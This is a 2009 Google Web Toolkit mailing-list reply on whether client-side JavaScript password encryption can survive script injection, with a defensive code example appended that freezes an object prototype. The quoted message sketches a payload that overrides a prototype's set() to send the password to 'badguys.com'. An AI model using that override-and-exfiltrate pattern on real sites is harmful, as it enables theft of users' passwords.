First off, good luck trying to disassemble the GWT compiled code - it's hard to read even when you know what the original Java code is doing.
Next, I don't think I understand the problem you are presenting. It seems to me that if you have a script-injection exploit in your code, there is no way you can code it to protect the user, since the attacking code can always modify the original code in whatever way is necessary to send the password to the attacker. So whether or not you implement the algorithm in Javascript is irrelevant. An algorithm is a step-by-step process, independent of the language used to express it. Security is a property of the algorithm/protocol, not the language.

Exactly how do you "block" the get & set functions? Also, it's not like those functions are standard, so I'm guessing they're your equivalent to the more common foo & bar.

On Tue, May 19, 2009 at 6:48 PM, Alyxandor <[email protected]> wrote:

> You can't attack the post-RSA password field, but if there's any point
> along the way that the password is passed inside javascript, it might
> be possible for a script-injection attacker to overwrite your
> functions / add getter functions to prototypes and post your password
> using something like rsa.prototype.set()=function(pass){addHack
> ('<script src="badguys.com?x='+pass+'/>');...}
> Or such. Of course,
> you sound like a smart guy who would already override such functions
> to prevent an attack, but not everybody thinks to manually block get()
> and set(), so having plain-script authentication would let badguys.com
> know if it's worth trying or not...

You received this message because you are subscribed to the Google Groups "Google Web Toolkit" group. For more options, visit this group at http://groups.google.com/group/Google-Web-Toolkit?hl=en
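One concrete way to "block" get() and set() in the sense the quoted post describes, as an added example that is not code from this thread (the Rsa constructor, its methods and the _pass field are assumed): freeze the prototype and constructor, then check that the tampering moves mentioned above no longer take effect.

```javascript
// Added example, not code from the thread: a tiny "rsa" object in the spirit of
// the quoted post (names Rsa, set, get, _pass are assumed), with its prototype
// frozen so that a later script cannot replace set()/get() or add a leaking method.

function Rsa() { this._pass = null; }
Rsa.prototype.set = function (pass) { this._pass = pass; return this; };
Rsa.prototype.get = function () { return this._pass; };

// Freeze the prototype (methods become non-writable and non-configurable, and no
// new properties can be added) and the constructor (so Rsa.prototype itself
// cannot be swapped for a different object).
Object.freeze(Rsa.prototype);
Object.freeze(Rsa);

// Attempt the tampering moves from the thread and report which ones the freeze
// blocked. In strict mode each assignment throws a TypeError; in sloppy mode it
// fails silently, so the checks compare identities rather than rely on exceptions.
function tamperingBlocked() {
  const originalSet = Rsa.prototype.set;
  const originalProto = Rsa.prototype;
  const r = new Rsa();

  try { Rsa.prototype.set = function () { return 'hijacked'; }; } catch (e) { /* frozen */ }
  try { Rsa.prototype.leak = function () { return this._pass; }; } catch (e) { /* frozen */ }
  try { Rsa.prototype = { set() { return 'hijacked'; } }; } catch (e) { /* frozen */ }
  // An own property on an instance cannot shadow a non-writable inherited one.
  try { r.set = function () { return 'hijacked'; }; } catch (e) { /* blocked */ }

  r.set('constructed-sample-password'); // constructed sample value
  return {
    methodKept: Rsa.prototype.set === originalSet && r.set === originalSet,
    noLeakAdded: typeof Rsa.prototype.leak === 'undefined',
    protoKept: Rsa.prototype === originalProto,
    valueIntact: r.get() === 'constructed-sample-password',
  };
}
```

Every field of the returned object is true; what freezing cannot do is stop a script that runs before this code, or one that reads the password field from the DOM directly, which is the point the reply above makes.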
